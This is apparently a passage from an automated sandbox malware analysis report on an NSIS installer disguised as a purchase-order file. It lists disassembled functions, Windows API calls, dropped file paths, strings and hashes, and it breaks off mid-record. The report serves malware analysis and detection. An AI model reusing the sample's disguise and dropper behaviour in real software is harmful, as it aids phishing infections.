                                                                      • Associated: 00000000.00000002.2608064111.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.00000000007BC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608699661.00000000007BE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_PO-10212024168877 PNG2023-W101.jbxd
                                                                      Similarity
                                                                      • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                                      • String ID: "C:\Users\user\Desktop\PO-10212024168877 PNG2023-W101.exe"$C:\Users\user\AppData\Local\Temp\$Frbids.tal$\*.*
                                                                      • API String ID: 2035342205-1027846086
                                                                      • Opcode ID: a8a4b792d9683b8994eb6cd94214ef05887bb3d9b353618b8ffd8ce1ac1b6fd8
                                                                      • Instruction ID: 15aabf9ae26d8a027305d4c4078bc37ad96aa8a5c182164a2950041f9cf2f42d
                                                                      • Opcode Fuzzy Hash: a8a4b792d9683b8994eb6cd94214ef05887bb3d9b353618b8ffd8ce1ac1b6fd8
                                                                      • Instruction Fuzzy Hash: C651DF30800A04BADB21AB618C45BBF7A78DF42355F54857BF449B61D2D73C4981EE6E
                                                                      Function 00406010 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 14fileCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • FindFirstFileA.KERNELBASE(75573410,0079FD90,C:\Users\user\AppData\Local\Temp\nsq8002.tmp,004058AF,C:\Users\user\AppData\Local\Temp\nsq8002.tmp,C:\Users\user\AppData\Local\Temp\nsq8002.tmp,00000000,C:\Users\user\AppData\Local\Temp\nsq8002.tmp,C:\Users\user\AppData\Local\Temp\nsq8002.tmp,75573410,?,C:\Users\user\AppData\Local\Temp\,004055CE,?,75573410,C:\Users\user\AppData\Local\Temp\), ref: 0040601B
                                                                      • FindClose.KERNEL32(00000000), ref: 00406027
                                                                      Strings
                                                                      • C:\Users\user\AppData\Local\Temp\nsq8002.tmp, xrefs: 00406010
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2608029986.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2608013440.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608047008.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.00000000007BC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608699661.00000000007BE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_PO-10212024168877 PNG2023-W101.jbxd
                                                                      Similarity
                                                                      • API ID: Find$CloseFileFirst
                                                                      • String ID: C:\Users\user\AppData\Local\Temp\nsq8002.tmp
                                                                      • API String ID: 2295610775-2063696683
                                                                      • Opcode ID: d30bbc16997dfcf9f9a572ec6341a2188e66bfdc939d37fad3f946c8dc482195
                                                                      • Instruction ID: 592bcfe3733b0aa744bdfcff45d7cd7e76fdd068ce72c1f71716353b7d55c377
                                                                      • Opcode Fuzzy Hash: d30bbc16997dfcf9f9a572ec6341a2188e66bfdc939d37fad3f946c8dc482195
                                                                      • Instruction Fuzzy Hash: 02D012319491305BC714977C7D4C84F7A6C9B193717114A32F46AF12E0C6749CA286E9
                                                                      Function 00403A1E Relevance: 59.8, APIs: 32, Strings: 2, Instructions: 345windowstringCOMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 179 403a1e-403a30 180 403b71-403b80 179->180 181 403a36-403a3c 179->181 183 403b82-403bca GetDlgItem * 2 call 403ef1 SetClassLongA call 40140b 180->183 184 403bcf-403be4 180->184 181->180 182 403a42-403a4b 181->182 187 403a60-403a63 182->187 188 403a4d-403a5a SetWindowPos 182->188 183->184 185 403c24-403c29 call 403f3d 184->185 186 403be6-403be9 184->186 201 403c2e-403c49 185->201 191 403beb-403bf6 call 401389 186->191 192 403c1c-403c1e 186->192 194 403a65-403a77 ShowWindow 187->194 195 403a7d-403a83 187->195 188->187 191->192 214 403bf8-403c17 SendMessageA 191->214 192->185 200 403ebe 192->200 194->195 197 403a85-403a9a DestroyWindow 195->197 198 403a9f-403aa2 195->198 204 403e9b-403ea1 197->204 205 403aa4-403ab0 SetWindowLongA 198->205 206 403ab5-403abb 198->206 202 403ec0-403ec7 200->202 208 403c52-403c58 201->208 209 403c4b-403c4d call 40140b 201->209 204->200 215 403ea3-403ea9 204->215 205->202 212 403ac1-403ad2 GetDlgItem 206->212 213 403b5e-403b6c call 403f58 206->213 210 403e7c-403e95 DestroyWindow EndDialog 208->210 211 403c5e-403c69 208->211 209->208 210->204 211->210 217 403c6f-403cbc call 405d2e call 403ef1 * 3 GetDlgItem 211->217 218 403af1-403af4 212->218 219 403ad4-403aeb SendMessageA IsWindowEnabled 212->219 213->202 214->202 215->200 221 403eab-403eb4 ShowWindow 215->221 249 403cc6-403d02 ShowWindow KiUserCallbackDispatcher call 403f13 EnableWindow 217->249 250 403cbe-403cc3 217->250 223 403af6-403af7 218->223 224 403af9-403afc 218->224 219->200 219->218 221->200 227 403b27-403b2c call 403eca 223->227 228 403b0a-403b0f 224->228 229 403afe-403b04 224->229 227->213 232 403b45-403b58 SendMessageA 228->232 234 403b11-403b17 228->234 229->232 233 403b06-403b08 229->233 232->213 233->227 237 403b19-403b1f call 40140b 234->237 238 403b2e-403b37 call 40140b 234->238 245 403b25 237->245 238->213 247 403b39-403b43 238->247 245->227 247->245 253 403d04-403d05 249->253 254 403d07 249->254 250->249 255 403d09-403d37 GetSystemMenu EnableMenuItem SendMessageA 253->255 254->255 256 403d39-403d4a SendMessageA 255->256 257 403d4c 255->257 258 403d52-403d8b call 403f26 call 405d0c lstrlenA call 405d2e SetWindowTextA call 401389 256->258 257->258 258->201 267 403d91-403d93 258->267 267->201 268 403d99-403d9d 267->268 269 403dbc-403dd0 DestroyWindow 268->269 270 403d9f-403da5 268->270 269->204 271 403dd6-403e03 CreateDialogParamA 269->271 270->200 272 403dab-403db1 270->272 271->204 274 403e09-403e60 call 403ef1 GetDlgItem GetWindowRect ScreenToClient SetWindowPos call 401389 271->274 272->201 273 403db7 272->273 273->200 274->200 279 403e62-403e75 ShowWindow call 403f3d 274->279 281 403e7a 279->281 281->204
                                                                      APIs
                                                                      • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403A5A
                                                                      • ShowWindow.USER32(?), ref: 00403A77
                                                                      • DestroyWindow.USER32 ref: 00403A8B
                                                                      • SetWindowLongA.USER32(?,00000000,00000000), ref: 00403AA7
                                                                      • GetDlgItem.USER32(?,?), ref: 00403AC8
                                                                      • SendMessageA.USER32(00000000,000000F3,00000000,00000000), ref: 00403ADC
                                                                      • IsWindowEnabled.USER32(00000000), ref: 00403AE3
                                                                      • GetDlgItem.USER32(?,00000001), ref: 00403B91
                                                                      • GetDlgItem.USER32(?,00000002), ref: 00403B9B
                                                                      • SetClassLongA.USER32(?,000000F2,?), ref: 00403BB5
                                                                      • SendMessageA.USER32(0000040F,00000000,00000001,?), ref: 00403C06
                                                                      • GetDlgItem.USER32(?,00000003), ref: 00403CAC
                                                                      • ShowWindow.USER32(00000000,?), ref: 00403CCD
                                                                      • KiUserCallbackDispatcher.NTDLL(?,?), ref: 00403CDF
                                                                      • EnableWindow.USER32(?,?), ref: 00403CFA
                                                                      • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00403D10
                                                                      • EnableMenuItem.USER32(00000000), ref: 00403D17
                                                                      • SendMessageA.USER32(?,000000F4,00000000,00000001), ref: 00403D2F
                                                                      • SendMessageA.USER32(?,00000401,00000002,00000000), ref: 00403D42
                                                                      • lstrlenA.KERNEL32(0079E540,?,0079E540,Regangen Setup), ref: 00403D6B
                                                                      • SetWindowTextA.USER32(?,0079E540), ref: 00403D7A
                                                                      • ShowWindow.USER32(?,0000000A), ref: 00403EAE
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2608029986.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2608013440.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608047008.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.00000000007BC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608699661.00000000007BE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_PO-10212024168877 PNG2023-W101.jbxd
                                                                      Similarity
                                                                      • API ID: Window$Item$MessageSend$Show$EnableLongMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
                                                                      • String ID: @y$Regangen Setup
                                                                      • API String ID: 3282139019-3144617067
                                                                      • Opcode ID: f91631ea6a7899119ed47f58db1b72be55114eb3759132e365ec33f9056147a3
                                                                      • Instruction ID: 604a4885fc931abc1044a41a4cf0f2958d917e977c7d56f4e50accb35e18e33b
                                                                      • Opcode Fuzzy Hash: f91631ea6a7899119ed47f58db1b72be55114eb3759132e365ec33f9056147a3
                                                                      • Instruction Fuzzy Hash: F1C1AE31904205ABEB216F61ED85E2B3EACEB4574AF00453EF501B11F1C739A942DB5E
                                                                      Function 0040368C Relevance: 47.5, APIs: 13, Strings: 14, Instructions: 215stringregistryCOMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 282 40368c-4036a4 call 4060a5 285 4036a6-4036b6 call 405c6a 282->285 286 4036b8-4036e9 call 405bf3 282->286 295 40370c-403735 call 403951 call 40586c 285->295 291 403701-403707 lstrcatA 286->291 292 4036eb-4036fc call 405bf3 286->292 291->295 292->291 300 40373b-403740 295->300 301 4037bc-4037c4 call 40586c 295->301 300->301 302 403742-403766 call 405bf3 300->302 307 4037d2-4037f7 LoadImageA 301->307 308 4037c6-4037cd call 405d2e 301->308 302->301 309 403768-40376a 302->309 311 403878-403880 call 40140b 307->311 312 4037f9-403829 RegisterClassA 307->312 308->307 313 40377b-403787 lstrlenA 309->313 314 40376c-403779 call 4057a9 309->314 323 403882-403885 311->323 324 40388a-403895 call 403951 311->324 315 403947 312->315 316 40382f-403873 SystemParametersInfoA CreateWindowExA 312->316 321 403789-403797 lstrcmpiA 313->321 322 4037af-4037b7 call 40577e call 405d0c 313->322 314->313 320 403949-403950 315->320 316->311 321->322 327 403799-4037a3 GetFileAttributesA 321->327 322->301 323->320 335 40389b-4038b5 ShowWindow call 406037 324->335 336 40391e-40391f call 404ff7 324->336 330 4037a5-4037a7 327->330 331 4037a9-4037aa call 4057c5 327->331 330->322 330->331 331->322 343 4038c1-4038d3 GetClassInfoA 335->343 344 4038b7-4038bc call 406037 335->344 339 403924-403926 336->339 341 403940-403942 call 40140b 339->341 342 403928-40392e 339->342 341->315 342->323 345 403934-40393b call 40140b 342->345 348 4038d5-4038e5 GetClassInfoA RegisterClassA 343->348 349 4038eb-40390e DialogBoxParamA call 40140b 343->349 344->343 345->323 348->349 353 403913-40391c call 4035dc 349->353 353->320
                                                                      APIs
                                                                        • Part of subcall function 004060A5: GetModuleHandleA.KERNEL32(?,?,?,00403156,00000009), ref: 004060B7
                                                                        • Part of subcall function 004060A5: GetProcAddress.KERNEL32(00000000,?), ref: 004060D2
                                                                      • lstrcatA.KERNEL32(1033,0079E540,80000001,Control Panel\Desktop\ResourceLocale,00000000,0079E540,00000000,00000002,75573410,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\PO-10212024168877 PNG2023-W101.exe",00000000), ref: 00403707
                                                                      • lstrlenA.KERNEL32(Call,?,?,?,Call,00000000,C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\snrkler\blaamunkerne,1033,0079E540,80000001,Control Panel\Desktop\ResourceLocale,00000000,0079E540,00000000,00000002,75573410), ref: 0040377C
                                                                      • lstrcmpiA.KERNEL32(?,.exe), ref: 0040378F
                                                                      • GetFileAttributesA.KERNEL32(Call), ref: 0040379A
                                                                      • LoadImageA.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\snrkler\blaamunkerne), ref: 004037E3
                                                                        • Part of subcall function 00405C6A: wsprintfA.USER32 ref: 00405C77
                                                                      • RegisterClassA.USER32(007A16E0), ref: 00403820
                                                                      • SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 00403838
                                                                      • CreateWindowExA.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 0040386D
                                                                      • ShowWindow.USER32(00000005,00000000), ref: 004038A3
                                                                      • GetClassInfoA.USER32(00000000,RichEdit20A,007A16E0), ref: 004038CF
                                                                      • GetClassInfoA.USER32(00000000,RichEdit,007A16E0), ref: 004038DC
                                                                      • RegisterClassA.USER32(007A16E0), ref: 004038E5
                                                                      • DialogBoxParamA.USER32(?,00000000,00403A1E,00000000), ref: 00403904
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2608029986.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2608013440.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608047008.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.00000000007BC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608699661.00000000007BE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_PO-10212024168877 PNG2023-W101.jbxd
                                                                      Similarity
                                                                      • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                                                      • String ID: "C:\Users\user\Desktop\PO-10212024168877 PNG2023-W101.exe"$.DEFAULT\Control Panel\International$.exe$1033$@y$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\snrkler\blaamunkerne$Call$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20A$_Nb
                                                                      • API String ID: 1975747703-3849932500
                                                                      • Opcode ID: 1f1d7b7cedc4fdc1a161c84c86f92609142e4f2c1f25f6f9bda009316c644032
                                                                      • Instruction ID: b6748c6733e3bb55aa357910a2c4fdec813f4d760fd6ac6bc3454eeade69f907
                                                                      • Opcode Fuzzy Hash: 1f1d7b7cedc4fdc1a161c84c86f92609142e4f2c1f25f6f9bda009316c644032
                                                                      • Instruction Fuzzy Hash: D06106B4504244AEE710AF659C45F3B3AACEB85789F00857FF900B22E1D77CAD019B2D
                                                                      Function 00402C66 Relevance: 24.7, APIs: 5, Strings: 9, Instructions: 182COMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 356 402c66-402cb4 GetTickCount GetModuleFileNameA call 40597f 359 402cc0-402cee call 405d0c call 4057c5 call 405d0c GetFileSize 356->359 360 402cb6-402cbb 356->360 368 402cf4 359->368 369 402ddb-402de9 call 402c02 359->369 361 402e98-402e9c 360->361 371 402cf9-402d10 368->371 375 402deb-402dee 369->375 376 402e3e-402e43 369->376 373 402d12 371->373 374 402d14-402d1d call 40308e 371->374 373->374 383 402d23-402d2a 374->383 384 402e45-402e4d call 402c02 374->384 378 402df0-402e08 call 4030a4 call 40308e 375->378 379 402e12-402e3c GlobalAlloc call 4030a4 call 402e9f 375->379 376->361 378->376 406 402e0a-402e10 378->406 379->376 405 402e4f-402e60 379->405 388 402da6-402daa 383->388 389 402d2c-402d40 call 40593a 383->389 384->376 394 402db4-402dba 388->394 395 402dac-402db3 call 402c02 388->395 389->394 403 402d42-402d49 389->403 396 402dc9-402dd3 394->396 397 402dbc-402dc6 call 40611a 394->397 395->394 396->371 404 402dd9 396->404 397->396 403->394 409 402d4b-402d52 403->409 404->369 410 402e62 405->410 411 402e68-402e6d 405->411 406->376 406->379 409->394 412 402d54-402d5b 409->412 410->411 413 402e6e-402e74 411->413 412->394 414 402d5d-402d64 412->414 413->413 415 402e76-402e91 SetFilePointer call 40593a 413->415 414->394 416 402d66-402d86 414->416 419 402e96 415->419 416->376 418 402d8c-402d90 416->418 420 402d92-402d96 418->420 421 402d98-402da0 418->421 419->361 420->404 420->421 421->394 422 402da2-402da4 421->422 422->394
                                                                      APIs
                                                                      • GetTickCount.KERNEL32 ref: 00402C77
                                                                      • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\PO-10212024168877 PNG2023-W101.exe,00000400), ref: 00402C93
                                                                        • Part of subcall function 0040597F: GetFileAttributesA.KERNELBASE(00000003,00402CA6,C:\Users\user\Desktop\PO-10212024168877 PNG2023-W101.exe,80000000,00000003), ref: 00405983
                                                                        • Part of subcall function 0040597F: CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 004059A5
                                                                      • GetFileSize.KERNEL32(00000000,00000000,007AA000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\PO-10212024168877 PNG2023-W101.exe,C:\Users\user\Desktop\PO-10212024168877 PNG2023-W101.exe,80000000,00000003), ref: 00402CDF
                                                                      Strings
                                                                      • C:\Users\user\Desktop\PO-10212024168877 PNG2023-W101.exe, xrefs: 00402C7D, 00402C8C, 00402CA0, 00402CC0
                                                                      • Error launching installer, xrefs: 00402CB6
                                                                      • Inst, xrefs: 00402D4B
                                                                      • C:\Users\user\Desktop, xrefs: 00402CC1, 00402CC6, 00402CCC
                                                                      • soft, xrefs: 00402D54
                                                                      • Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error, xrefs: 00402E3E
                                                                      • Null, xrefs: 00402D5D
                                                                      • "C:\Users\user\Desktop\PO-10212024168877 PNG2023-W101.exe", xrefs: 00402C66
                                                                      • C:\Users\user\AppData\Local\Temp\, xrefs: 00402C6D
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2608029986.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2608013440.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608047008.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.00000000007BC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608699661.00000000007BE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_PO-10212024168877 PNG2023-W101.jbxd
                                                                      Similarity
                                                                      • API ID: File$AttributesCountCreateModuleNameSizeTick
                                                                      • String ID: "C:\Users\user\Desktop\PO-10212024168877 PNG2023-W101.exe"$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\PO-10212024168877 PNG2023-W101.exe$Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error$Null$soft
                                                                      • API String ID: 4283519449-2838533473
                                                                      • Opcode ID: 48d0b30a573a01b2c2b1968d3d6d53f6fa88bda45e86464b42b605cd2148996d
                                                                      • Instruction ID: fe9ef23653e85685a193ad9c5457c4b2e55d644b791d7b95544962d8ab1ad500
                                                                      • Opcode Fuzzy Hash: 48d0b30a573a01b2c2b1968d3d6d53f6fa88bda45e86464b42b605cd2148996d
                                                                      • Instruction Fuzzy Hash: CC51F471941214AFEB119F65DE89B9E7BA8EF04364F14803BF904B62D1D7BC8D408BAD
                                                                      Function 00401751 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 147stringtimeCOMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 754 401751-401774 call 402a3a call 4057eb 759 401776-40177c call 405d0c 754->759 760 40177e-401790 call 405d0c call 40577e lstrcatA 754->760 765 401795-40179b call 405f77 759->765 760->765 770 4017a0-4017a4 765->770 771 4017a6-4017b0 call 406010 770->771 772 4017d7-4017da 770->772 780 4017c2-4017d4 771->780 781 4017b2-4017c0 CompareFileTime 771->781 773 4017e2-4017fe call 40597f 772->773 774 4017dc-4017dd call 40595a 772->774 782 401800-401803 773->782 783 401876-40189f call 404f25 call 402e9f 773->783 774->773 780->772 781->780 784 401805-401847 call 405d0c * 2 call 405d2e call 405d0c call 405502 782->784 785 401858-401862 call 404f25 782->785 797 4018a1-4018a5 783->797 798 4018a7-4018b3 SetFileTime 783->798 784->770 817 40184d-40184e 784->817 795 40186b-401871 785->795 800 4028d8 795->800 797->798 799 4018b9-4018c4 CloseHandle 797->799 798->799 802 4018ca-4018cd 799->802 803 4028cf-4028d2 799->803 804 4028da-4028de 800->804 806 4018e2-4018e5 call 405d2e 802->806 807 4018cf-4018e0 call 405d2e lstrcatA 802->807 803->800 813 4018ea-402273 call 405502 806->813 807->813 813->804 817->795 819 401850-401851 817->819 819->785
                                                                      APIs
                                                                      • lstrcatA.KERNEL32(00000000,00000000,Call,C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\snrkler\blaamunkerne\Trangsvurderingens\Transfunderedes,00000000,00000000,00000031), ref: 00401790
                                                                      • CompareFileTime.KERNEL32(-00000014,?,Call,Call,00000000,00000000,Call,C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\snrkler\blaamunkerne\Trangsvurderingens\Transfunderedes,00000000,00000000,00000031), ref: 004017BA
                                                                        • Part of subcall function 00405D0C: lstrcpynA.KERNEL32(?,?,00000400,0040319A,Regangen Setup,NSIS Error), ref: 00405D19
                                                                        • Part of subcall function 00404F25: lstrlenA.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsq8002.tmp\System.dll,00000000,0078FCF8,755723A0,?,?,?,?,?,?,?,?,?,00402FD7,00000000,?), ref: 00404F5E
                                                                        • Part of subcall function 00404F25: lstrlenA.KERNEL32(00402FD7,Skipped: C:\Users\user\AppData\Local\Temp\nsq8002.tmp\System.dll,00000000,0078FCF8,755723A0,?,?,?,?,?,?,?,?,?,00402FD7,00000000), ref: 00404F6E
                                                                        • Part of subcall function 00404F25: lstrcatA.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsq8002.tmp\System.dll,00402FD7,00402FD7,Skipped: C:\Users\user\AppData\Local\Temp\nsq8002.tmp\System.dll,00000000,0078FCF8,755723A0), ref: 00404F81
                                                                        • Part of subcall function 00404F25: SetWindowTextA.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsq8002.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsq8002.tmp\System.dll), ref: 00404F93
                                                                        • Part of subcall function 00404F25: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00404FB9
                                                                        • Part of subcall function 00404F25: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00404FD3
                                                                        • Part of subcall function 00404F25: SendMessageA.USER32(?,00001013,?,00000000), ref: 00404FE1
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2608029986.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2608013440.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608047008.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.00000000007BC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608699661.00000000007BE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_PO-10212024168877 PNG2023-W101.jbxd
                                                                      Similarity
                                                                      • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                                      • String ID: C:\Users\user\AppData\Local\Temp\nsq8002.tmp$C:\Users\user\AppData\Local\Temp\nsq8002.tmp\System.dll$C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\snrkler\blaamunkerne\Trangsvurderingens\Transfunderedes$Call
                                                                      • API String ID: 1941528284-522038915
                                                                      • Opcode ID: 5963c7d106c76f5ca0071d1a776a8225d19f187018aad275a070e7a80bf2da84
                                                                      • Instruction ID: e334bcbcf7859558867c6a38b10ffbeddee8f855bc543c6a7f27992f07fd6e89
